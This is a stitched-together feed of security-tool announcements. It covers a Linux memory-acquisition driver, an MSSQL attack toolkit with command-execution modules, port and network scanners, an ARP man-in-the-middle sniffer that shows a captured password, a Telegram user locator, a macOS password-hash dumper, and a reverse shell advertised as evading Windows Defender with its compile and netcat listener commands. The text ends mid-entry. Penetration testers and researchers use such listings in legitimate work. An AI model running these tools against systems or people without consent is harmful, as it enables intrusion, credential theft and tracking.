There is an example code demonstrating and explaining (in detail) how to interact with the driver. The user-space API reference can furthermore be found in ./userspace_interface/linpmem_shared.h.

  1. cd demo
  2. gcc -o test test.c
  3. (sudo) ./test // <= you need sudo if you did not use chown on the device.

This code is important, if you want to understand how to directly interact with the driver instead of using a library. It can also be used as a short function test.

Command Line Interface Tool

There is an (optional) basic command line interface tool to Linpmem, the pmem CLI tool. It can be found here: https://github.com/vobst/linpmem-cli. Aside from the source code, there is also a precompiled CLI tool as well as the precompiled static library and headers that can be found here (signed). Note: this is a preliminary version, be sure to check for updates, as many additions and enhancements will follow soon.

The pmem CLI tool can be used for testing the various functions of Linpmem in a (relatively) safe and convenient manner. Linpmem can also be loaded by this tool instead of using insmod/rmmod, with some extra options in future. This also has the advantage that pmem auto-creates the right device for you for immediate use. It is extremely portable and runs on any Linux system (and, in fact, has been tested even on a Linux 2.6).

$ ./pmem -h
Command-line client for the linpmem driver

Usage: pmem [OPTIONS] [COMMAND]

Commands:
insmod Load the linpmem driver
help Print this message or the help of the given subcommand(s)

Options:
-a, --address <ADDRESS> Address for physical read operations
-v, --virt-address <VIRT_ADDRESS> Translate address in target process' address space (default: current process)
-s, --size <SIZE> Size of buffer read operations
-m, --mode <MODE> Access mode for read operations [possible values: byte, word, dword, qword, buffer]
-p, --pid <PID> Target process for cr3 info and virtual-to-physical translations
--cr3 Query cr3 value of target process (default: current process)
--verbose Display debug output
-h, --help Print help (see more with '--help')
-V, --version Print version

If you want to compile the cli tool yourself, change to its directory and follow the instructions in the (cli) Readme to build it. Otherwise, just download the prebuilt program, it should work on any Linux. To load the kernel driver with the cli tool:

# pmem insmod path/to/linpmem.ko

The advantage of using the pmem tool to load the driver is that you do not have to create the device file yourself, and it will offer (on next releases) to choose who owns the linpmem device.

Libraries

The pmem command line interface is only a thin wrapper around a small Rust library that exposes an API for interfacing with the driver. More advanced users can also use this library. The library is automatically compiled (as static portable library) along with the pmem cli tool when compiling from https://github.com/vobst/linpmem-cli, but also included (precompiled) here (signed). Note: this is a preliminary version, more to follow soon.

If you do not want to use the usermode library and prefer to interface with the driver directly on your own, you can find its user-space API/interface and documentation in ./userspace_interface/linpmem_shared.h. We also provide example code in demo/test.c that explains how to use the driver directly.

Memdumping tool

Not implemented yet.

Tested Linux Distributions

  • Debian, self-compiled 6.4.X, Qemu/KVM, not paravirtualized.
    • PTI: off/on
  • Debian 12, Qemu/KVM, fully paravirtualized.
    • PTI: on
  • Ubuntu server, Qemu/KVM, not paravirtualized.
    • PTI: on
  • Fedora 38, Qemu/KVM, fully paravirtualized.
    • PTI: on
  • Baremetal Linux test, AMI BIOS: Linux 6.4.4
    • PTI: on
  • Baremetal Linux test, HP: Linux 6.4.4
    • PTI: on
  • Baremetal, Arch[-hardened], Dell BIOS, Linux 6.4.X
  • Baremetal, Debian, 6.1.X
  • Baremetal, Ubuntu 20.04 with Secure Boot on. Works, but sign driver first.
  • Baremetal, Ubuntu 22.04, Linux 6.2.X

Handling Secure Boot

If the system reports the following error message when loading the module, it might be because of secure boot:

$ sudo insmod linpmem.ko
insmod: ERROR: could not insert module linpmem.ko: Operation not permitted

There are different ways to still load the module. The obvious one is to disable secure boot in your UEFI settings.

If your distribution supports it, a more elegant solution would be to sign the module before using it. This can be done using the following steps (tested on Ubuntu 20.04).

  1. Install mokutil:
    $ sudo apt install mokutil
  2. Create the singing key material:
    $ openssl req -new -newkey rsa:4096 -keyout mok-signing.key -out mok-signing.crt -outform DER -days 365 -nodes -subj "/CN=Some descriptive name/"
    Make sure to adjust the options to your needs. Especially, consider the key length (-newkey), the validity (-days), the option to set a key pass phrase (-nodes; leave it out, if you want to set a pass phrase), and the common name to include into the certificate (-subj).
  3. Register the new MOK:
    $ sudo mokutil --import mok-signing.crt
    You will be asked for a password, which is required in the following step. Consider using a password, which you can type on a US keyboard layout.
  4. Reboot the system. It will enter a MOK enrollment menu. Follow the instructions to enroll your new key.
  5. Sign the module Once the MOK is enrolled, you can sign your module.
    $ /usr/src/linux-headers-$(uname -r)/scripts/sign-file sha256 path/to/mok-singing/MOK.key path/to//MOK.cert path/to/linpmem.ko

After that, you should be able to load the module.

Note that from a forensic-readiness perspective, you should prepare a signed module before you need it, as the system will reboot twice during the process described above, destroying most of your volatile data in memory.

Known Issues

  • Huge page read is not implemented. Linpmem recognizes a huge page and rejects the read, for now.
  • Reading from mapped io and DMA space will be done with CPU caching enabled.
  • No locks are taken during the page table walk. This might lead to funny results when concurrent modifications are going on. This is a general and (mostly unsolvable) problem of live RAM reading, without halting the entire OS to full stop.
  • Secure Boot (Ubuntu): please sign your driver prior to using.
  • Any CPU-powered memory encryption, e.g., AMD SME, Intel SGX/TDX, ...
  • Pluton chips?

(Please report potential issues if you encounter anything.)

Under work

  • Loading precompiled driver on any Linux.
  • Processor cache control. Example: for uncached reading of mapped I/O and DMA space.

Future work

  • Arm/Mips support. (far future work)
  • Legacy kernels (such as 2.6), unix-based kernels

Acknowledgements

Linpmem, as well as Winpmem, would not exist without the work of our predecessors of the (now retired) REKALL project: https://github.com/google/rekall.

  • We would like to thank Mike Cohen and Johannes StΓΌttgen for their pioneer work and open source contribution on PTE remapping, a technique which is still in use 10 years later.

Our open source contributors:

  • Viviane Zwanger
  • Valentin Obst


PipeViewer - A Tool That Shows Detailed Information About Named Pipes In Windows

By: Zion3R


A GUI tool for viewing Windows Named Pipes and searching for insecure permissions.

The tool was published as part of a research about Docker named pipes:
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 1"
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 2"

Overview

PipeViewer is a GUI tool that allows users to view details about Windows Named pipes and their permissions. It is designed to be useful for security researchers who are interested in searching for named pipes with weak permissions or testing the security of named pipes. With PipeViewer, users can easily view and analyze information about named pipes on their systems, helping them to identify potential security vulnerabilities and take appropriate steps to secure their systems.


Usage

Double-click the EXE binary and you will get the list of all named pipes.

Build

We used Visual Studio to compile it.
When downloading it from GitHub you might get error of block files, you can use PowerShell to unblock them:

Get-ChildItem -Path 'D:\tmp\PipeViewer-main' -Recurse | Unblock-File

Warning

We built the project and uploaded it so you can find it in the releases.
One problem is that the binary will trigger alerts from Windows Defender because it uses the NtObjerManager package which is flagged as virus.
Note that James Forshaw talked about it here.
We can't change it because we depend on third-party DLL.

Features

  • A detailed overview of named pipes.
  • Filter\highlight rows based on cells.
  • Bold specific rows.
  • Export\Import to\from JSON.
  • PipeChat - create a connection with available named pipes.

Demo

PipeViewer3_v1.0.mp4

Credit

We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get information about named pipes.

License

Copyright (c) 2023 CyberArk Software Ltd. All rights reserved
This repository is licensed under Apache-2.0 License - see LICENSE for more details.

References

For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.



I2P 2.4.0

I2P is an anonymizing network, offering a simple layer that identity-sensitive applications can use to securely communicate. All data is wrapped with several layers of encryption, and the network is both distributed and dynamic, with no trusted parties. This is the source code release version.

PySQLRecon - Offensive MSSQL Toolkit Written In Python, Based Off SQLRecon

By: Zion3R


PySQLRecon is a Python port of the awesome SQLRecon project by @sanjivkawa. See the commands section for a list of capabilities.


Install

PySQLRecon can be installed with pip3 install pysqlrecon or by cloning this repository and running pip3 install .

Commands

All of the main modules from SQLRecon have equivalent commands. Commands noted with [PRIV] require elevated privileges or sysadmin rights to run. Alternatively, commands marked with [NORM] can likely be run by normal users and do not require elevated privileges.

Support for impersonation ([I]) or execution on linked servers ([L]) are denoted at the end of the command description.

adsi                 [PRIV] Obtain ADSI creds from ADSI linked server [I,L]
agentcmd [PRIV] Execute a system command using agent jobs [I,L]
agentstatus [PRIV] Enumerate SQL agent status and jobs [I,L]
checkrpc [NORM] Enumerate RPC status of linked servers [I,L]
clr [PRIV] Load and execute .NET assembly in a stored procedure [I,L]
columns [NORM] Enumerate columns within a table [I,L]
databases [NORM] Enumerate databases on a server [I,L]
disableclr [PRIV] Disable CLR integration [I,L]
disableole [PRIV] Disable OLE automation procedures [I,L]
disablerpc [PRIV] Disable RPC and RPC Out on linked server [I]
disablexp [PRIV] Disable xp_cmdshell [I,L]
enableclr [PRIV] Enable CLR integration [I,L]
enableole [PRIV] Enable OLE automation procedures [I,L]
enablerpc [PRIV] Enable RPC and RPC Out on linked server [I]
enablexp [PRIV] Enable xp_cmdshell [I,L]
impersonate [NORM] Enumerate users that can be impersonated
info [NORM] Gather information about the SQL server
links [NORM] Enumerate linked servers [I,L]
olecmd [PRIV] Execute a system command using OLE automation procedures [I,L]
query [NORM] Execute a custom SQL query [I,L]
rows [NORM] Get the count of rows in a table [I,L]
search [NORM] Search a table for a column name [I,L]
smb [NORM] Coerce NetNTLM auth via xp_dirtree [I,L]
tables [NORM] Enu merate tables within a database [I,L]
users [NORM] Enumerate users with database access [I,L]
whoami [NORM] Gather logged in user, mapped user and roles [I,L]
xpcmd [PRIV] Execute a system command using xp_cmdshell [I,L]

Usage

PySQLRecon has global options (available to any command), with some commands introducing additional flags. All global options must be specified before the command name:

pysqlrecon [GLOBAL_OPTS] COMMAND [COMMAND_OPTS]

View global options:

pysqlrecon --help

View command specific options:

pysqlrecon [GLOBAL_OPTS] COMMAND --help

Change the database authenticated to, or used in certain PySQLRecon commands (query, tables, columns rows), with the --database flag.

Target execution of a PySQLRecon command on a linked server (instead of the SQL server being authenticated to) using the --link flag.

Impersonate a user account while running a PySQLRecon command with the --impersonate flag.

--link and --impersonate and incompatible.

Development

pysqlrecon uses Poetry to manage dependencies. Install from source and setup for development with:

git clone https://github.com/tw1sm/pysqlrecon
cd pysqlrecon
poetry install
poetry run pysqlrecon --help

Adding a Command

PySQLRecon is easily extensible - see the template and instructions in resources

TODO

  • Add SQLRecon SCCM commands
  • Add Azure SQL DB support?

References and Credits



MacMaster - MAC Address Changer

By: Zion3R


MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.

Features

  • Custom MAC Address: Set a specific MAC address to your network interface.
  • Random MAC Address: Generate and set a random MAC address.
  • Reset to Original: Reset the MAC address to its original hardware value.
  • Custom OUI: Set a custom Organizationally Unique Identifier (OUI) for the MAC address.
  • Version Information: Easily check the version of MacMaster you are using.

Installation

MacMaster requires Python 3.6 or later.

  1. Clone the repository:
    $ git clone https://github.com/HalilDeniz/MacMaster.git
  2. Navigate to the cloned directory:
    cd MacMaster
  3. Install the package:
    $ python setup.py install

Usage

$ macmaster --help         
usage: macmaster [-h] [--interface INTERFACE] [--version]
[--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]

MacMaster: Mac Address Changer

options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Network interface to change MAC address
--version, -V Show the version of the program
--random, -r Set a random MAC address
--newmac NEWMAC, -nm NEWMAC
Set a specific MAC address
--customoui CUSTOMOUI, -co CUSTOMOUI
Set a custom OUI for the MAC address
--reset, -rs Reset MAC address to the original value

Arguments

  • --interface, -i: Specify the network interface.
  • --random, -r: Set a random MAC address.
  • --newmac, -nm: Set a specific MAC address.
  • --customoui, -co: Set a custom OUI for the MAC address.
  • --reset, -rs: Reset MAC address to the original value.
  • --version, -V: Show the version of the program.
  1. Set a specific MAC address:
    $ macmaster.py -i eth0 -nm 00:11:22:33:44:55
  2. Set a random MAC address:
    $ macmaster.py -i eth0 -r
  3. Reset MAC address to its original value:
    $ macmaster.py -i eth0 -rs
  4. Set a custom OUI:
    $ macmaster.py -i eth0 -co 08:00:27
  5. Show program version:
    $ macmaster.py -V

Replace eth0 with your desired network interface.

Note

You must run this script as root or use sudo to run this script for it to work properly. This is because changing a MAC address requires root privileges.

Contributing

Contributions are welcome! To contribute to MacMaster, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

For any inquiries or further information, you can reach me through the following channels:

Contact



NetworkSherlock - Powerful And Flexible Port Scanning Tool With Shodan

By: Zion3R


NetworkSherlock is a powerful and flexible port scanning tool designed for network security professionals and penetration testers. With its advanced capabilities, NetworkSherlock can efficiently scan IP ranges, CIDR blocks, and multiple targets. It stands out with its detailed banner grabbing capabilities across various protocols and integration with Shodan, the world's premier service for scanning and analyzing internet-connected devices. This Shodan integration enables NetworkSherlock to provide enhanced scanning capabilities, giving users deeper insights into network vulnerabilities and potential threats. By combining local port scanning with Shodan's extensive database, NetworkSherlock offers a comprehensive tool for identifying and analyzing network security issues.


Features

  • Scans multiple IPs, IP ranges, and CIDR blocks.
  • Supports port scanning over TCP and UDP protocols.
  • Detailed banner grabbing feature.
  • Ping check for identifying reachable targets.
  • Multi-threading support for fast scanning operations.
  • Option to save scan results to a file.
  • Provides detailed version information.
  • Colorful console output for better readability.
  • Shodan integration for enhanced scanning capabilities.
  • Configuration file support for Shodan API key.

Installation

NetworkSherlock requires Python 3.6 or later.

  1. Clone the repository:
    git clone https://github.com/HalilDeniz/NetworkSherlock.git
  2. Install the required packages:
    pip install -r requirements.txt

Configuration

Update the networksherlock.cfg file with your Shodan API key:

[SHODAN]
api_key = YOUR_SHODAN_API_KEY

Usage

Port Scan Tool positional arguments: target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5, 192.168.1.0/24) options: -h, --help show this help message and exit -p PORTS, --ports PORTS Ports to scan (e.g. 1-1024, 21,22,80, or 80) -t THREADS, --threads THREADS Number of threads to use -P {tcp,udp}, --protocol {tcp,udp} Protocol to use for scanning -V, --version-info Used to get version information -s SAVE_RESULTS, --save-results SAVE_RESULTS File to save scan results -c, --ping-check Perform ping check before scanning --use-shodan Enable Shodan integration for additional information " dir="auto">
python3 networksherlock.py --help
usage: networksherlock.py [-h] [-p PORTS] [-t THREADS] [-P {tcp,udp}] [-V] [-s SAVE_RESULTS] [-c] target

NetworkSherlock: Port Scan Tool

positional arguments:
target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5,
192.168.1.0/24)

options:
-h, --help show this help message and exit
-p PORTS, --ports PORTS
Ports to scan (e.g. 1-1024, 21,22,80, or 80)
-t THREADS, --threads THREADS
Number of threads to use
-P {tcp,udp}, --protocol {tcp,udp}
Protocol to use for scanning
-V, --version-info Used to get version information
-s SAVE_RESULTS, --save-results SAVE_RESULTS
File to save scan results
-c, --ping-check Perform ping check before scanning
--use-shodan Enable Shodan integration for additional information

Basic Parameters

  • target: The target IP address(es), IP range, or CIDR block to scan.
  • -p, --ports: Ports to scan (e.g., 1-1000, 22,80,443).
  • -t, --threads: Number of threads to use.
  • -P, --protocol: Protocol to use for scanning (tcp or udp).
  • -V, --version-info: Obtain version information during banner grabbing.
  • -s, --save-results: Save results to the specified file.
  • -c, --ping-check: Perform a ping check before scanning.
  • --use-shodan: Enable Shodan integration.

Example Usage

Basic Port Scan

Scan a single IP address on default ports:

python networksherlock.py 192.168.1.1

Custom Port Range

Scan an IP address with a custom range of ports:

python networksherlock.py 192.168.1.1 -p 1-1024

Multiple IPs and Port Specification

Scan multiple IP addresses on specific ports:

python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443

CIDR Block Scan

Scan an entire subnet using CIDR notation:

python networksherlock.py 192.168.1.0/24 -p 80

Using Multi-Threading

Perform a scan using multiple threads for faster execution:

python networksherlock.py 192.168.1.1-192.168.1.5 -p 1-1024 -t 20

Scanning with Protocol Selection

Scan using a specific protocol (TCP or UDP):

python networksherlock.py 192.168.1.1 -p 53 -P udp

Scan with Shodan

python networksherlock.py 192.168.1.1 --use-shodan

Scan Multiple Targets with Shodan

python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443 -V --use-shodan

Banner Grabbing and Save Results

Perform a detailed scan with banner grabbing and save results to a file:

python networksherlock.py 192.168.1.1 -p 1-1000 -V -s results.txt

Ping Check Before Scanning

Scan an IP range after performing a ping check:

python networksherlock.py 10.0.0.1-10.0.0.255 -c

OUTPUT EXAMPLE

$ python3 networksherlock.py 10.0.2.12 -t 25 -V -p 21-6000 -t 25
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21-6000
Threads : 25
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
21 /tcp open telnet 220 (vsFTPd 2.3.4)
80 /tcp open http HTTP/1.1 200 OK
139 /tcp open netbios-ssn %SMBr
25 /tcp open smtp 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
23 /tcp open smtp #' #'
445 /tcp open microsoft-ds %SMBr
514 /tcp open shell
512 /tcp open exec Where are you?
1524/tcp open ingreslock ro ot@metasploitable:/#
2121/tcp open iprop 220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.2.12]
3306/tcp open mysql >
5900/tcp open unknown RFB 003.003
53 /tcp open domain
---------------------------------------------

OutPut Example

$ python3 networksherlock.py 10.0.2.0/24 -t 10 -V -p 21-1000
********************************************
Scanning target: 10.0.2.1
Scanning IP : 10.0.2.1
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
53 /tcp open domain
********************************************
Scanning target: 10.0.2.2
Scanning IP : 10.0.2.2
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
445 /tcp open microsoft-ds
135 /tcp open epmap
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21- 1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
21 /tcp open ftp 220 (vsFTPd 2.3.4)
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
23 /tcp open telnet #'
80 /tcp open http HTTP/1.1 200 OK
53 /tcp open kpasswd 464/udpcp
445 /tcp open domain %SMBr
3306/tcp open mysql >
********************************************
Scanning target: 10.0.2.20
Scanning IP : 10.0.2.20
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9

Contributing

Contributions are welcome! To contribute to NetworkSherlock, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact



Nim-Shell - Reverse Shell That Can Bypass Windows Defender Detection

By: Zion3R


Reverse shell that can bypass windows defender detection


$ apt install nim

Compilation

nim c -d:mingw --app:gui nimshell.nim

Change the IP address and port number you want to listen to in the nimshell.nim file according to your device.

and listen

 $ nc -nvlp 4444


American Fuzzy Lop plus plus 4.09c

Google's American Fuzzy Lop is a brute-force fuzzer coupled with an exceedingly simple but rock-solid instrumentation-guided genetic algorithm. afl++ is a superior fork to Google's afl. It has more speed, more and better mutations, more and better instrumentation, custom module support, etc.

PacketSpy - Powerful Network Packet Sniffing Tool Designed To Capture And Analyze Network Traffic

By: Zion3R


PacketSpy is a powerful network packet sniffing tool designed to capture and analyze network traffic. It provides a comprehensive set of features for inspecting HTTP requests and responses, viewing raw payload data, and gathering information about network devices. With PacketSpy, you can gain valuable insights into your network's communication patterns and troubleshoot network issues effectively.


Features

  • Packet Capture: Capture and analyze network packets in real-time.
  • HTTP Inspection: Inspect HTTP requests and responses for detailed analysis.
  • Raw Payload Viewing: View raw payload data for deeper investigation.
  • Device Information: Gather information about network devices, including IP addresses and MAC addresses.

Installation

git clone https://github.com/HalilDeniz/PacketSpy.git

Requirements

PacketSpy requires the following dependencies to be installed:

pip install -r requirements.txt

Getting Started

To get started with PacketSpy, use the following command-line options:

root@denizhalil:/PacketSpy# python3 packetspy.py --help                          
usage: packetspy.py [-h] [-t TARGET_IP] [-g GATEWAY_IP] [-i INTERFACE] [-tf TARGET_FIND] [--ip-forward] [-m METHOD]

options:
-h, --help show this help message and exit
-t TARGET_IP, --target TARGET_IP
Target IP address
-g GATEWAY_IP, --gateway GATEWAY_IP
Gateway IP address
-i INTERFACE, --interface INTERFACE
Interface name
-tf TARGET_FIND, --targetfind TARGET_FIND
Target IP range to find
--ip-forward, -if Enable packet forwarding
-m METHOD, --method METHOD
Limit sniffing to a specific HTTP method

Examples

  1. Device Detection
root@denizhalil:/PacketSpy# python3 packetspy.py -tf 10.0.2.0/24 -i eth0

Device discovery
**************************************
Ip Address Mac Address
**************************************
10.0.2.1 52:54:00:12:35:00
10.0.2.2 52:54:00:12:35:00
10.0.2.3 08:00:27:78:66:95
10.0.2.11 08:00:27:65:96:cd
10.0.2.12 08:00:27:2f:64:fe

  1. Man-in-the-Middle Sniffing
root@denizhalil:/PacketSpy# python3 packetspy.py -t 10.0.2.11 -g 10.0.2.1 -i eth0
******************* started sniff *******************

HTTP Request:
Method: b'POST'
Host: b'testphp.vulnweb.com'
Path: b'/userinfo.php'
Source IP: 10.0.2.20
Source MAC: 08:00:27:04:e8:82
Protocol: HTTP
User-Agent: b'Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0'

Raw Payload:
b'uname=admin&pass=mysecretpassword'

HTTP Response:
Status Code: b'302'
Content Type: b'text/html; charset=UTF-8'
--------------------------------------------------

FootNote

Https work still in progress

Contributing

Contributions are welcome! To contribute to PacketSpy, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

If you have any questions, comments, or suggestions about PacketSpy, please feel free to contact me:

License

PacketSpy is released under the MIT License. See LICENSE for more information.



Telegram-Nearby-Map - Discover The Location Of Nearby Telegram Users

By: Zion3R


Telegram Nearby Map uses OpenStreetMap and the official Telegram library to find the position of nearby users.

Please note: Telegram's API was updated a while ago to make nearby user distances less precise, preventing exact location calculations. Therefore, Telegram Nearby Map displays users nearby, but does not show their exact location.

Inspired by Ahmed's blog post and a Hacker News discussion. Developed by github.com/tejado.


How does it work?

Every 25 seconds all nearby users will be received with TDLib from Telegram. This includes the distance of every nearby user to "my" location. With three distances from three different points, it is possible to calculate the position of the nearby user.

This only finds Telegram users which have activated the nearby feature. Per default it is deactivated.

Installation

Requirements: node.js and an Telegram account

  1. Create an API key for your Telegram account here
  2. Download the repository
  3. Create config.js (see config.example.js) and put your Telegram API credentials in it
  4. Install all dependencies: npm install
  5. Start the app: npm start
  6. Look carefully at the output: you will need to confirm your Telegram login
  7. Go to http://localhost:3000 and have fun

Changelog

2023-09-23

  • Switched to prebuild-tdlib
  • Updated all dependencies
  • Bugfix of the search distance field

2021-11-13

  • Added tdlib.native for Linux (now it works in GitHub Codespaces)
  • Updated all dependencies
  • Bugfixes


Faraday 5.0.0

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

APIDetector - Efficiently Scan For Exposed Swagger Endpoints Across Web Domains And Subdomains

By: Zion3R


APIDetector is a powerful and efficient tool designed for testing exposed Swagger endpoints in various subdomains with unique smart capabilities to detect false-positives. It's particularly useful for security professionals and developers who are engaged in API testing and vulnerability scanning.


Features

  • Flexible Input: Accepts a single domain or a list of subdomains from a file.
  • Multiple Protocols: Option to test endpoints over both HTTP and HTTPS.
  • Concurrency: Utilizes multi-threading for faster scanning.
  • Customizable Output: Save results to a file or print to stdout.
  • Verbose and Quiet Modes: Default verbose mode for detailed logs, with an option for quiet mode.
  • Custom User-Agent: Ability to specify a custom User-Agent for requests.
  • Smart Detection of False-Positives: Ability to detect most false-positives.

Getting Started

Prerequisites

Before running APIDetector, ensure you have Python 3.x and pip installed on your system. You can download Python here.

Installation

Clone the APIDetector repository to your local machine using:

git clone https://github.com/brinhosa/apidetector.git
cd apidetector
pip install requests

Usage

Run APIDetector using the command line. Here are some usage examples:

  • Common usage, scan with 30 threads a list of subdomains using a Chrome user-agent and save the results in a file:

    python apidetector.py -i list_of_company_subdomains.txt -o results_file.txt -t 30 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
  • To scan a single domain:

    python apidetector.py -d example.com
  • To scan multiple domains from a file:

    python apidetector.py -i input_file.txt
  • To specify an output file:

    python apidetector.py -i input_file.txt -o output_file.txt
  • To use a specific number of threads:

    python apidetector.py -i input_file.txt -t 20
  • To scan with both HTTP and HTTPS protocols:

    python apidetector.py -m -d example.com
  • To run the script in quiet mode (suppress verbose output):

    python apidetector.py -q -d example.com
  • To run the script with a custom user-agent:

    python apidetector.py -d example.com -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"

Options

  • -d, --domain: Single domain to test.
  • -i, --input: Input file containing subdomains to test.
  • -o, --output: Output file to write valid URLs to.
  • -t, --threads: Number of threads to use for scanning (default is 10).
  • -m, --mixed-mode: Test both HTTP and HTTPS protocols.
  • -q, --quiet: Disable verbose output (default mode is verbose).
  • -ua, --user-agent: Custom User-Agent string for requests.

RISK DETAILS OF EACH ENDPOINT APIDETECTOR FINDS

Exposing Swagger or OpenAPI documentation endpoints can present various risks, primarily related to information disclosure. Here's an ordered list based on potential risk levels, with similar endpoints grouped together APIDetector scans:

1. High-Risk Endpoints (Direct API Documentation):

  • Endpoints:
    • '/swagger-ui.html', '/swagger-ui/', '/swagger-ui/index.html', '/api/swagger-ui.html', '/documentation/swagger-ui.html', '/swagger/index.html', '/api/docs', '/docs', '/api/swagger-ui', '/documentation/swagger-ui'
  • Risk:
    • These endpoints typically serve the Swagger UI interface, which provides a complete overview of all API endpoints, including request formats, query parameters, and sometimes even example requests and responses.
    • Risk Level: High. Exposing these gives potential attackers detailed insights into your API structure and potential attack vectors.

2. Medium-High Risk Endpoints (API Schema/Specification):

  • Endpoints:
    • '/openapi.json', '/swagger.json', '/api/swagger.json', '/swagger.yaml', '/swagger.yml', '/api/swagger.yaml', '/api/swagger.yml', '/api.json', '/api.yaml', '/api.yml', '/documentation/swagger.json', '/documentation/swagger.yaml', '/documentation/swagger.yml'
  • Risk:
    • These endpoints provide raw Swagger/OpenAPI specification files. They contain detailed information about the API endpoints, including paths, parameters, and sometimes authentication methods.
    • Risk Level: Medium-High. While they require more interpretation than the UI interfaces, they still reveal extensive information about the API.

3. Medium Risk Endpoints (API Documentation Versions):

  • Endpoints:
    • '/v2/api-docs', '/v3/api-docs', '/api/v2/swagger.json', '/api/v3/swagger.json', '/api/v1/documentation', '/api/v2/documentation', '/api/v3/documentation', '/api/v1/api-docs', '/api/v2/api-docs', '/api/v3/api-docs', '/swagger/v2/api-docs', '/swagger/v3/api-docs', '/swagger-ui.html/v2/api-docs', '/swagger-ui.html/v3/api-docs', '/api/swagger/v2/api-docs', '/api/swagger/v3/api-docs'
  • Risk:
    • These endpoints often refer to version-specific documentation or API descriptions. They reveal information about the API's structure and capabilities, which could aid an attacker in understanding the API's functionality and potential weaknesses.
    • Risk Level: Medium. These might not be as detailed as the complete documentation or schema files, but they still provide useful information for attackers.

4. Lower Risk Endpoints (Configuration and Resources):

  • Endpoints:
    • '/swagger-resources', '/swagger-resources/configuration/ui', '/swagger-resources/configuration/security', '/api/swagger-resources', '/api.html'
  • Risk:
    • These endpoints often provide auxiliary information, configuration details, or resources related to the API documentation setup.
    • Risk Level: Lower. They may not directly reveal API endpoint details but can give insights into the configuration and setup of the API documentation.

Summary:

  • Highest Risk: Directly exposing interactive API documentation interfaces.
  • Medium-High Risk: Exposing raw API schema/specification files.
  • Medium Risk: Version-specific API documentation.
  • Lower Risk: Configuration and resource files for API documentation.

Recommendations:

  • Access Control: Ensure that these endpoints are not publicly accessible or are at least protected by authentication mechanisms.
  • Environment-Specific Exposure: Consider exposing detailed API documentation only in development or staging environments, not in production.
  • Monitoring and Logging: Monitor access to these endpoints and set up alerts for unusual access patterns.

Contributing

Contributions to APIDetector are welcome! Feel free to fork the repository, make changes, and submit pull requests.

Legal Disclaimer

The use of APIDetector should be limited to testing and educational purposes only. The developers of APIDetector assume no liability and are not responsible for any misuse or damage caused by this tool. It is the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no responsibility for unauthorized or illegal use of this tool. Before using APIDetector, ensure you have permission to test the network or systems you intend to scan.

License

This project is licensed under the MIT License.

Acknowledgments



Osx-Password-Dumper - A Tool To Dump Users'S .Plist On A Mac OS System And To Convert Them Into A Crackable Hash

By: Zion3R


 ο”“ OSX Password Dumper Script

Overview

A bash script to retrieve user's .plist files on a macOS system and to convert the data inside it to a crackable hash format. (to use with John The Ripper or Hashcat)

Useful for CTFs/Pentesting/Red Teaming on macOS systems.


Prerequisites

  • The script must be run as a root user (sudo)
  • macOS environment (tested on a macOS VM Ventura beta 13.0 (22A5266r))

Usage

sudo ./osx_password_cracker.sh OUTPUT_FILE /path/to/save/.plist


NetProbe - Network Probe

By: Zion3R


NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

Features

  • Scan for devices on a specified IP address or subnet
  • Display the IP address, MAC address, manufacturer, and device model of discovered devices
  • Live tracking of devices (optional)
  • Save scan results to a file (optional)
  • Filter by manufacturer (e.g., 'Apple') (optional)
  • Filter by IP range (e.g., '192.168.1.0/24') (optional)
  • Scan rate in seconds (default: 5) (optional)

Download

You can download the program from the GitHub page.

$ git clone https://github.com/HalilDeniz/NetProbe.git

Installation

To install the required libraries, run the following command:

$ pip install -r requirements.txt

Usage

To run the program, use the following command:

